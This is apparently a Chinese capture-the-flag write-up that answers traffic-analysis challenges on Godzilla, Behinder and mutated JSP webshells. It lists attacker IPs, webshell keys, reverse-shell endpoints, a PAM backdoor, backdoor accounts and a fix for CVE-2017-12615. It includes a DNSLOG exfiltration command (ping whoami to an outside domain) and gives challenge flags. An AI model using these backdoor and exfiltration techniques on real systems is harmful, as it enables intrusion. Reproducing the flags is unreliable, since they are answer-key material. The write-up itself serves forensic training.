玄机平台 流量分析题目合集WP
字数 2737 2025-09-01 11:26:03

玄机平台流量分析题目解析与教学文档

一、哥斯拉4.0流量分析

1. 黑客入侵信息

  • 黑客IP: 192.168.31.190
  • 利用漏洞: CVE-2017-12615 (Tomcat任意文件写入漏洞)
  • 木马文件: hello.jsp
  • 连接密码: 7f0e6f
  • 解密密钥: 1710acba6220f62b

2. 黑客操作分析

  • 第一条命令: uname -r (查看内核版本)
  • 当前shell权限: root权限
  • 系统发行版本: Debian GNU/Linux 10 (buster)
  • 过滤查询命令: dpkg -l libpam-modules:amd64

3. 后门信息

  • 反连IP和PORT: 192.168.31.143:1313
  • 后门文件: /tmp/pam_unix.so
  • 后门密码: XJ@123
  • DNSLOG服务器: c0ee2ad2d8.ipv6.xxx.eu.org.

4. 分析技巧

  • 使用Wireshark追踪TCP流(流31、46、47、48、51、52、56)
  • 解密流量时注意删除头尾各16个字符
  • 可使用蓝队工具箱辅助分析

二、哥斯拉ekp版本流量分析

1. 木马信息

  • 文件名: .index.jsp
  • 连接密码: mypass
  • 连接密钥: 9adbe0b3033881f8
  • 回显参数: Rec106e_config

2. 黑客操作

  • 第一条命令: cat /etc/passwd
  • 反连IP和PORT: 192.168.31.205,4444
  • 反连第一条命令: ls
  • 新增后门账号: 用户名x,密码Xj@666.

3. 后门配置

  • 后门文件: /etc/hosts.allow
  • SSH公钥: 需检查/etc/ssh/sshd_config并计算MD5

4. 代理分析

  • 代理类型: suo5
  • 代理路径: /connect
  • 连接密码MD5: e3c77fd790af8d25fe271cd275eb405e

5. 端口扫描

  • 扫描IP和端口: 127.0.0.1,873,3306,80,8080,81,8081,21,22,88,8088,8888,1433,443,445,3389,222
  • 开放端口: 222,8081

三、冰蝎3.0-jsp流量分析

1. 基本信息

  • 黑客IP: 192.168.31.61
  • Webshell名: indeX.jsp
  • 解密key: 3f0af7bb4dbcfbd7

2. 黑客操作

  • 第一条命令: ifconfig
  • 上传文件内容: ZmxhZ3s0ODUzNzViN2IwNmFkODU2YTc4OGMwZDk1MjI5ZjM1Y30= (Base64解码后为flag{485375b7b06ad856a788c0d95229f35c})
  • 下载文件内容: 3aacab9ca36a6894c75048e4faf47052

3. 服务器flag

  • flag位置: /root目录下
  • flag值: ae1d04dd3d15c6a18f904fe50fdf7eca

四、某变异Webshell流量分析

1. 木马信息

  • 文件名: hello.jsp
  • 连接密码: SjIHRC7oSVIE
  • 通信key: oszXCfTeXHpIkMS3

2. 黑客操作

  • 第一条命令: ping -c 1 whoami.d5454c8975.ipv6.1433.eu.org.
  • 回显方式: DNSLOG回显(d5454c8975.ipv6.1433.eu.org.)
  • 反连IP和PORT: 192.168.31.190|2024
  • 反连第一条命令: ls

3. 后门分析

  • 后门连接主机: 10.10.13.37|4444
  • 加密文件解密: 使用AES-CBC模式,IV为文件前16个可见字符

4. 漏洞修复

  • 漏洞原因: Tomcat启用了HTTP PUT请求方法且readonly参数设置为false
  • 修复方法:
    1. 修改/opt/apache-tomcat-8.5.19/conf/web.xml
    2. org.apache.catalina.servlets.DefaultServlet的readonly设为True
    3. 或直接删除该配置(默认为true)
  • 验证修复: 运行/root/check_tomcat得到flagba5579c780bf4a799e03a60c6be383e9

五、代理工具特征分析

工具 协议层特征 加密特征 行为特征
FRP 固定头部标识,版本明文 TLS可选,指纹固定 长连接+固定心跳
Stowaway SOCKS5扩展标记,多级转发标识 AES密钥交换暴露特征 高频短连接+规律端口切换
Suo5 HTTP分块传输,动态请求头 异或加密+动态TLS指纹 随机化延迟+反向代理融合

六、分析技巧总结

  1. 流量解密:

    • 哥斯拉流量通常需要删除头尾各16个字符
    • 冰蝎流量使用固定密钥解密
    • 变异Webshell可能使用AES-CBC模式

  2. 后门查找:

    • 检查/tmp目录常见后门文件
    • 查看/etc/ssh/sshd_config配置变更
    • 检查/etc/hosts.allow文件修改

  3. 漏洞利用:

    • CVE-2017-12615利用Tomcat PUT方法漏洞
    • 修复方法为禁用PUT方法或设置readonly=true

  4. 代理识别:

    • 通过User-Agent变化识别suo5代理
    • 分析HTTP路径和连接密码特征

  5. 加密文件解密:

    • 确定加密算法(AES-CBC常见)
    • 查找IV(通常是文件前16字节)
    • 通过逆向分析获取密钥生成逻辑
玄机平台流量分析题目解析与教学文档 一、哥斯拉4.0流量分析 1. 黑客入侵信息 黑客IP : 192.168.31.190 利用漏洞 : CVE-2017-12615 (Tomcat任意文件写入漏洞) 木马文件 : hello.jsp 连接密码 : 7f0e6f 解密密钥 : 1710acba6220f62b 2. 黑客操作分析 第一条命令 : uname -r (查看内核版本) 当前shell权限 : root权限 系统发行版本 : Debian GNU/Linux 10 (buster) 过滤查询命令 : dpkg -l libpam-modules:amd64 3. 后门信息 反连IP和PORT : 192.168.31.143:1313 后门文件 : /tmp/pam_unix.so 后门密码 : XJ@123 DNSLOG服务器 : c0ee2ad2d8.ipv6.xxx.eu.org. 4. 分析技巧 使用Wireshark追踪TCP流(流31、46、47、48、51、52、56) 解密流量时注意删除头尾各16个字符 可使用蓝队工具箱辅助分析 二、哥斯拉ekp版本流量分析 1. 木马信息 文件名 : .index.jsp 连接密码 : mypass 连接密钥 : 9adbe0b3033881f8 回显参数 : Rec106e_config 2. 黑客操作 第一条命令 : cat /etc/passwd 反连IP和PORT : 192.168.31.205,4444 反连第一条命令 : ls 新增后门账号 : 用户名 x ,密码 Xj@666. 3. 后门配置 后门文件 : /etc/hosts.allow SSH公钥 : 需检查 /etc/ssh/sshd_config 并计算MD5 4. 代理分析 代理类型 : suo5 代理路径 : /connect 连接密码MD5 : e3c77fd790af8d25fe271cd275eb405e 5. 端口扫描 扫描IP和端口 : 127.0.0.1,873,3306,80,8080,81,8081,21,22,88,8088,8888,1433,443,445,3389,222 开放端口 : 222,8081 三、冰蝎3.0-jsp流量分析 1. 基本信息 黑客IP : 192.168.31.61 Webshell名 : indeX.jsp 解密key : 3f0af7bb4dbcfbd7 2. 黑客操作 第一条命令 : ifconfig 上传文件内容 : ZmxhZ3s0ODUzNzViN2IwNmFkODU2YTc4OGMwZDk1MjI5ZjM1Y30= (Base64解码后为 flag{485375b7b06ad856a788c0d95229f35c} ) 下载文件内容 : 3aacab9ca36a6894c75048e4faf47052 3. 服务器flag flag位置 : /root 目录下 flag值 : ae1d04dd3d15c6a18f904fe50fdf7eca 四、某变异Webshell流量分析 1. 木马信息 文件名 : hello.jsp 连接密码 : SjIHRC7oSVIE 通信key : oszXCfTeXHpIkMS3 2. 黑客操作 第一条命令 : ping -c 1 whoami .d5454c8975.ipv6.1433.eu.org. 回显方式 : DNSLOG回显( d5454c8975.ipv6.1433.eu.org. ) 反连IP和PORT : 192.168.31.190|2024 反连第一条命令 : ls 3. 后门分析 后门连接主机 : 10.10.13.37|4444 加密文件解密 : 使用AES-CBC模式,IV为文件前16个可见字符 4. 漏洞修复 漏洞原因 : Tomcat启用了HTTP PUT请求方法且readonly参数设置为false 修复方法 : 修改 /opt/apache-tomcat-8.5.19/conf/web.xml 将 org.apache.catalina.servlets.DefaultServlet 的readonly设为True 或直接删除该配置(默认为true) 验证修复 : 运行 /root/check_tomcat 得到flag ba5579c780bf4a799e03a60c6be383e9 五、代理工具特征分析 | 工具 | 协议层特征 | 加密特征 | 行为特征 | |-----------|-------------------------------------|-----------------------------------|-------------------------------| | FRP | 固定头部标识,版本明文 | TLS可选,指纹固定 | 长连接+固定心跳 | | Stowaway | SOCKS5扩展标记,多级转发标识 | AES密钥交换暴露特征 | 高频短连接+规律端口切换 | | Suo5 | HTTP分块传输,动态请求头 | 异或加密+动态TLS指纹 | 随机化延迟+反向代理融合 | 六、分析技巧总结 流量解密 : 哥斯拉流量通常需要删除头尾各16个字符 冰蝎流量使用固定密钥解密 变异Webshell可能使用AES-CBC模式 后门查找 : 检查 /tmp 目录常见后门文件 查看 /etc/ssh/sshd_config 配置变更 检查 /etc/hosts.allow 文件修改 漏洞利用 : CVE-2017-12615利用Tomcat PUT方法漏洞 修复方法为禁用PUT方法或设置readonly=true 代理识别 : 通过User-Agent变化识别suo5代理 分析HTTP路径和连接密码特征 加密文件解密 : 确定加密算法(AES-CBC常见) 查找IV(通常是文件前16字节) 通过逆向分析获取密钥生成逻辑